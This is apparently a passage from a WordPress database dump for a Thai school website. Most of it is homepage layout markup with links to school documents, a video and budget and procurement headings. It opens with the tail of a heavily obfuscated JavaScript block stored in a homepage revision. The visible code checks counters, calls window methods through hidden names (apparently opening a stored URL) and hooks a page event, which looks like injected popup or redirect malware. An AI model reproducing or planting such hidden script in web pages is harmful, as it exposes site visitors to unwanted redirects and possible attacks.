_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-28 12:14:06','2024-08-28 05:14:06','',19,'http://watprato.ssk.in.th/?p=246',0,'revision','',0),
(247,1,'2024-08-28 12:27:37','2024-08-28 05:27:37','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1u06_5GP1uT_R9axW6_ASul5adIiVXpDR/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1u06_5GP1uT_R9axW6_ASul5adIiVXpDR/view?usp=sharing\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 